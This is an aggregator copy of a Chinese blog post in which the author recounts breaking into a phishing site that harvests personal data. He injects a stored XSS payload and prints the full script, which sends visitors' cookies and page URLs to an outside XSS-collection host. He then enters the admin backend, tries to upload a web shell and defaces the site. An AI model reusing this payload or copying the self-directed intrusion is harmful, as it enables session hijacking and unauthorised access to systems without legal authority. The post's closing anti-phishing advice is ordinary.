惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Google DeepMind News
Google DeepMind News
Stack Overflow Blog
Stack Overflow Blog
Hugging Face - Blog
Hugging Face - Blog
博客园_首页
T
The Blog of Author Tim Ferriss
博客园 - 叶小钗
N
Netflix TechBlog - Medium
腾讯CDC
C
Check Point Blog
P
Proofpoint News Feed
Engineering at Meta
Engineering at Meta
GbyAI
GbyAI
S
SegmentFault 最新的问题
F
Fortinet All Blogs
美团技术团队
U
Unit 42
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
博客园 - 司徒正美
F
Full Disclosure
Recorded Future
Recorded Future
D
DataBreaches.Net
博客园 - 【当耐特】
Martin Fowler
Martin Fowler
J
Java Code Geeks
I
InfoQ
Y
Y Combinator Blog
A
About on SuperTechFans
AI
AI
爱范儿
爱范儿
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Forbes - Security
Forbes - Security
W
WeLiveSecurity
M
MIT News - Artificial intelligence
雷峰网
雷峰网
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Simon Willison's Weblog
Simon Willison's Weblog
Schneier on Security
Schneier on Security
The GitHub Blog
The GitHub Blog
Security Archives - TechRepublic
Security Archives - TechRepublic
aimingoo的专栏
aimingoo的专栏
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
G
GRAHAM CLULEY
Know Your Adversary
Know Your Adversary
Latest news
Latest news
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
D
Docker
Recent Commits to openclaw:main
Recent Commits to openclaw:main
量子位
V2EX - 技术
V2EX - 技术
Project Zero
Project Zero

龙辉's Blog - 学习笔记

天方云签程序开源 - 龙辉's Blog CTFSHOW-菜狗杯(部分WP) - 龙辉's Blog 贵州师范大学抢课脚本-正方教务系统V8.0.0 - 龙辉's Blog 简单实现每日健康自动打卡 - 龙辉's Blog 弱类型与强类型语言“=”号的不同以及引发的安全问题 - 龙辉's Blog php获取客户端ip以及ip伪造 - 龙辉's Blog php7.2中each()函数被弃用的替换办法 - 龙辉's Blog 云签网站问题反馈贴 - 龙辉's Blog 高三第一次考试总结 - 龙辉's Blog
XSS经典漏洞复现-手撕某非法获取个人信息网站 - 龙辉's Blog
博主: Tinker-站长 · 2022-05-29 · via 龙辉's Blog - 学习笔记
  • 发布时间:
  • 5156 次浏览
  • 1 条评论
  • 2485字数
  • 分类: php
  1. 首页
  2. 正文  
  3. 分享到:

记一次手动入侵某个非法获取个人信息网站

想到诈骗分子现在还是这么猖狂,居然把非法获取个人信息的二维码发到我的眼前,这我又怎么能忍~这不得想办法打掉他.随便做一下网络安全科普,当然了,自己也还是在学习的小白.

声明:以下仅为一次简单的记录,提供思路及过程,仅供学习交流,请不要用于非法用途,由此教程产生的法律问题均与本人无关!

0x01

和往常一样正常打开QQ,无意间看到群消息有这么一个文档.qrcode.png,出于本能,这肯定是个钓鱼网站...那就扫进去看看究竟有什么猫腻.index.jpg,可以看到,扫进去之后是这么一个页面。吐槽一下这网站做得一眼假好吧。。但是上当受骗的人还是很多。

0x02

为了先了解一下网站结构,先随便输入信息提交吧。~K1%RW03KKUTM}OV8@%Z6_N.png,随便输入账号密码,进入到index.jpg,一样随便输入一些符合规则的文字进去。成功提交.网站返回。基本就是这么一个流程

0x03

漏洞复现

只要用户能输入的地方大部分都存在xss漏洞,其中储存型漏洞伤害较大。在输入框这里输入js代码,可用src引入引入自己的代码,![X3OEB9NMB1(13YBW4[8NS]T.png][5]

<div style="display:none"><script src=http://xsscom.com//Wn7zcb></script></div>

其中引入的具体代码如下

(function(){(new Image()).src='http://xsscom.com/index.php?do=api&id=Wn7zcb&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if(''==1){keep=new Image();keep.src='http://xsscom.com/index.php?do=keepsession&id=Wn7zcb&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

利用的是后台直接输出用户输出的内容,浏览器直接执行用户输入的恶意木马,能够document.cookie,当后台执行我插入的木马之后,就会发送后台地址以及token到我这里。没一会儿就中招了。

![`E8T]0$E(BHM2(APAOXI7Q.png
可以看到后台地址,对方的ip以及ua信息,cookie。成功进入后台
%XR(}UC6LLCBNCS4C3$B[VN.png
可以看到很多大学生的信息...而且很多条,并且它有很多个网站,所以收集了大量信息,并且又利用被获取的继续发送,广泛传播。原本想在这个上传点传入大马getshell的,但是一直没能成功,图片马也不能解析。因此没有获取到服务器。只能挂个黑页了

(W1D5}V{044US$[`653C$WO.png

所有呢在最后我希望你们不要看到获取信息的输入框就输入自己的个人信息,也不要随便扫二维码。在打开未知的网站前可以去去工信部查询对方网站是否为备案以及有相应的运行资质。政府网站后缀统一为gov.cn,学校网站后缀统一为edu.cn后缀等

我的博客即将同步至腾讯云+社区,邀请大家一同入驻:https://cloud.tencent.com/developer/support-plan?invite_code=qpwmu9jb7yaa


版权属于:龙辉博客

本文链接:https://blog.eirds.cn/377.html

如果没有特别声明则为本博原创。转载时须注明出处及本声明!

赞赏作者

如果觉得我的文章对你有用,请随意赞赏

XSS经典漏洞复现-手撕某非法获取个人信息网站